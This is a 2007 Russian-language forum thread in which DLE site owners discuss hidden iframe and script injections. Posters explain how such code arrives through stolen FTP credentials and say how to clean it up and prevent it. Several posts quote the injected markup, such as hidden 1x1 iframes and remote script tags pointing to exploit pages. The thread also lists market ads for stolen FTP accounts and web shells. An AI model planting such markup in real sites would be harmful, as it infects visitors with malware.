xsash 9 Опубликовано: 4 марта 2007 Рассказать Опубликовано: 4 марта 2007 Народу становится все больше, тех кто понимает чтото в php и вообще сети (с точки зрения матчасти) все меньше. Вероятно тут есть обратная зависимость =\ Итак. если Вы нашли на своем сайте код типа <iframe src=http://***/***/ex.php border=0 width=1 height=1></iframe> или <script src=http://***/load.js></script> (иногда такой код просто зашифрован яваскриптами - для невозможности прочтения) мои поздравления. с Вашего сайта либо гонится РУ трафик, либо используется для распространения какого-нить лоадера (который в дальнейшем загружается на зараженную машину другие трояны, начиная от пинча, и до ддос троев) Итак откуда у вас такое счастье. Если Вы подумали что ктото ваш сайт взломал - забудьте, на НАХ никому не дались. если будут ломать конкретно Вас - просто повесят дефейс. Им же нужно показать - что Вас поимели. Тогда возникает вопрос - откуда. Ну если не считать упорных слухов что есть приватные сплоиты для DLE верси(и/й) ?.? (я лично ниодин из них не видел ни у кого из знакомых) то можно сказать что кто-то получил доступ к Вашему ftp. это можно осуществить двумя путями. 1) вы заражены - все ваши пароли у злоумышлинников (например трой pinch3 - гугль рулит) - как вы заразились.... 1.1) открыли "фотку" девушки из icq 1.2) глянули флеш ролик с приклеенным троем 1.3) зашли на страницу как у вас, которая содержит експлоит (опять же гугль подскажет) 2) наиболее правдивый вариант - поимели не Вас, а вашего хостера, и как сделствие еще и все остальные сайты которые он поддерживает (т.е. в этом теплом и темном месте не вы одни, а с целой компанией) сушествуют скрипты, которым необходимо подсунуть список ftp:pass ftp:pass ftp:pass ftp:pass и они АВТОМАТОМ прописывают во все index.php/index.html и прочие файлы по умолчанию заданный текст. обыно это наш любимый ифрейм с адресом ведущим на сплоит =) есть куча людей, которые просто с удовольствием покупают такие списки (ну плюс желательно чтобы был хороший индекс и пиар) по несколько тысяч ftp например вот вам заголовки >Покупаю фтп в больших количествах >Покупаю ФТП с PR>4, веб-шеллы, руты >Покупаю ФТП (edu, gov, com pr5) >FTP Toolz pack - скрипт для работы с ftp-акками >КУПЛЮ ДОРОГО: roots, ftps, shells, webshells >Куплю FTP, вебшеллы. PR >=3 >Куплю веб-шелы и FTP в любых зонах, любой PR >~ нужны ФТП(и ШЕЛЛЫ!) .EDU ~ >Возьму Фтп, вэб-шеллы >Скупаю ftp/shells/traff/bd >EDU 60-150$ беру. И обычные домены приветствуются. >покупаю FTP и вебшеллы к доменам в зонах .edu .gov и это только один форум! =) ИТОГО. 1) проверьтесь антивирусниками 2) удалите мусор в виде фреймов 3) смените пароли 4) скажите хостеру, что у него проблемы 5) поменяйте браузер с IE6 просьба не флеймить, а задавать конкретыне вопросы по сабжу - постараюсь ответить Цитата Ссылка на сообщение Поделиться на других сайтах
Foxa 0 Опубликовано: 4 марта 2007 Рассказать Опубликовано: 4 марта 2007 наиболее правдивый вариант - поимели не Вас, а вашего хостера Бред... не надо всю вину валить на хостера Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 4 марта 2007 Рассказать Опубликовано: 4 марта 2007 Автор уговорил. я всегда знал, что самая главная ошибка в 90% сидит за метр от монитора. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
гиперон 0 Опубликовано: 5 марта 2007 Рассказать Опубликовано: 5 марта 2007 (изменено) а где в DLE могут сидеть эти фреймы? я обнаружил один в index файле но когда я его отуда убираю у меня эксплоер выдаёт ошибку(( типа страница загружена с ошибками да и с фреймом сайт работает ка кни вчём не бывало открыл архвные фалы старых проинсталеных версий DLE там в индекс файле тоже это <iframe src='http://strumpf1.com/yabb/Sources/' width='1' height='1' style='visibility: hidden;'></iframe> откуда оно взялось Изменено 5 марта 2007 пользователем гиперон Цитата Ссылка на сообщение Поделиться на других сайтах
MSD 0 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Оно взялось из нуленой версии. Удивительно, правда? ))) Цитата Ссылка на сообщение Поделиться на других сайтах
medi 0 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Не обязательно нуль. Цитата Ссылка на сообщение Поделиться на других сайтах
solobon 0 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Я сменил пароль на ФИП и больше он не появлялся Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Антивирус встроенный в DLE этот эксплоит ловит? Или вручную надо это искать? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Антивирус встроенный в DLE этот эксплоит ловит? ловит в 5.5. если вы предварительно до этого сделаете снимок системы Цитата Ссылка на сообщение Поделиться на других сайтах
EVRIAL 0 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Спасибо за статью, но для меня это уже пройденный этап Такая история была со мной, когда я ещё сидел на IE6, но даже NOD32 с последними базами не смог защитить от пинча... вот так.. xsash, если не трудно, будь добр расскажи как защититься от пинча.. Ведь он обходит практически все антивирусники и фаеры... Цитата Ссылка на сообщение Поделиться на других сайтах
Alexandr 1 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 но даже NOD32 Помоему лутше Капреа ничего нет. А то что хостеров опускают это факт. Сейчас на многие хостеры идет дос атака. Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 zuven, Что кассается антивирусника, Каспер (ихмо) великий тормоз всего, он приколый для сисадминов в офисе, но не для дома... В 5.5 версии DLE делайте снимок в антивирусе, а потом проверяйте. По сути, в записях iframe, виноваты хостеры (не грамотная настройка сервера и принебрежение безопасности - а может не знание). А если хостинг majordomo.ru, то я бы переехал (собственно, что и сделал годик назад), так же как и с агавы, админы серверов там не компитентны вообще, их ломали/заражали, так и будут (пока грамотных не наберут, для обслуживания серверов). Что бы не ловить всё это, надо на нормальных хостах сайты ставить... Цитата Ссылка на сообщение Поделиться на других сайтах
Lyubovnick3 1 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Каспер грузит сильно компьютер, но к счастью мне это незаметно. Был такой вроде как анекдот: Устроили тестирование антивируса Касперского и NOD32. Запустили в компьютер вирус. NOD32 ни один не пропустил. Установили Каспера, запустили вирусы. Так же ни одного не пропустил. Но не из-за того, что качественный антивирус, а из-за того, что вся процессорная память была занята Касперским и вирус не мог запустится И всё таки Каспера я предпочитаю Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Snow Land, тож предпочитаю каспера, но не всегда его запускаю. Работать параллельно с прогами, требующими много памяти - невозможно. Ладно, это оф. Хотел спросить Stude_nt: скажите плиз: использую хостинг infobox.ru, пока не встречался с подобными проблемами, но всё равно как считаете - можно этой компании доверять? или не сталкивались? Цитата Ссылка на сообщение Поделиться на других сайтах
medi 0 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 infobox.ru А по моему инфобокс давно уже себя зарекомендовал как нормальный хостинг, я вот думаю к ним свой дедик поставить. Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 (изменено) Автор EVRIAL да никак. просто банальные правила. патченная система, патченные проги, браузер НЕ IE? не открывать левые ссылки. у меня вот антивируса и нет подавно.... только фаер рекламу режет... и ничего, живой zuven дос причем тут? ну вот скажи, кому хостер чейто дался? другое дело чейто проект убивают, это нормально, поэтому и хостер прогибается Изменено 6 марта 2007 пользователем xsash Цитата Ссылка на сообщение Поделиться на других сайтах
Lyubovnick3 1 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Во дела, так тут у всех всё пропатченое И нах я и Windows XP / Vista покупал, и антивирусы Кстати, кто сталкивался с программой Trust Cleaner Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Автор не, бывает мозги не пропатчены =\ я сам раза 2 просто _случайно_ открывал левые ссылки и запускал файлы. обычно заработаешься над проектом, а тут те ссылка от друга... а то что он мне ссылко никогда не дает доходит после минуты... а его протроянили... ну и начинается чистака компа, смена паролей... ну никто от этого не застрахован Цитата Ссылка на сообщение Поделиться на других сайтах
Lyubovnick3 1 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 xsash, В этом плане кстати, антивирус и облегчает жизнь Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 6 марта 2007 Рассказать Опубликовано: 6 марта 2007 Автор Snow Land человек который РЕАЛЬНО занимается троянами, НИКОГДА не будет использовать вирусы, которые палятся. в тя пинчем чтоли кинуться чистяком? =) или на связку сплоитов пустить по ссылке, которая чтоже не определится ничем? не нужно забывать еще кучу приватных бонусов которые ТОЖЕ "облегчают жизнь" Цитата Ссылка на сообщение Поделиться на других сайтах
Lyubovnick3 1 Опубликовано: 7 марта 2007 Рассказать Опубликовано: 7 марта 2007 Ну может тогда рассмотрим что такое вирус? Это порядок определённых байт, или как это называется "сигнатуры". Вирус должен содержать именно определённый порядок и никак иначе. Это не программа блокнот или тот же фотошоп, который содержит транслитериpoванный машинный код, а просто цифровой порядок и ничего более. Видел HEX редакторы? Вот, это и есть сигнатуры, из которых состоят так называемые вредоносные коды. Нарушения этого порядка приведёт просто к деструкции. Стоит почитать некоторые книги, которые остались в библиотеках, времён IBM ... Так что понятие вирус не такое буквальное, как ты написал выше постом. Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 7 марта 2007 Рассказать Опубликовано: 7 марта 2007 Al-x, об этом хосте не слышал ни чего плохого... Snow Land, я не сталкивался с Trust Cleaner, но на мой взгляд, это всё параноя... Подобных программ куча: Antiy GhostBusters Pro, Anti-keylogger, McAfee AntiSpyware Enterprise Standalone и для совсем параноиков Safe’n’Sec Personal (программа жесть, в купе с антивирусом (только не с Каспером) и Agnitum Outpost Firewall PRO) вообще не пробиваемая стена, парой даже админу не реально завершить или запустить некоторые скрытые процессы Цитата Ссылка на сообщение Поделиться на других сайтах
Lyubovnick3 1 Опубликовано: 7 марта 2007 Рассказать Опубликовано: 7 марта 2007 Stude_nt, вот был у меня этот Trust Cleaner. Почитай, что это такое (привожу конкретные ссылки): http://www.softboard.ru/lofiversion/index.php/t38431.html http://virusinfo.info/showthread.php?t=6017 Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 7 марта 2007 Рассказать Опубликовано: 7 марта 2007 (изменено) Почитал... К сведению принял... собственно, я не устанавливаю левых прог, период тестирования компа закончился у меня пару лет назад... теперь только проверенное ПО ставлю... в общем, познавательно почитать тем, кто любит поэксперементировать , а в итоге ифреймы... Изменено 7 марта 2007 пользователем Stude_nt Цитата Ссылка на сообщение Поделиться на других сайтах
гиперон 0 Опубликовано: 7 марта 2007 Рассказать Опубликовано: 7 марта 2007 Хотел спросить Stude_nt: скажите плиз: использую хостинг infobox.ru, пока не встречался с подобными проблемами, но всё равно как считаете - можно этой компании доверять? или не сталкивались? тоже им пользуюсь, но не доверяю уже, не радует он меня(( постоянно у них какие-то проблемы с сервами как-то движёк от этого накрылся(( едиснственно скорость у них хорошая следующим этапом буду брать mchost.ru Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.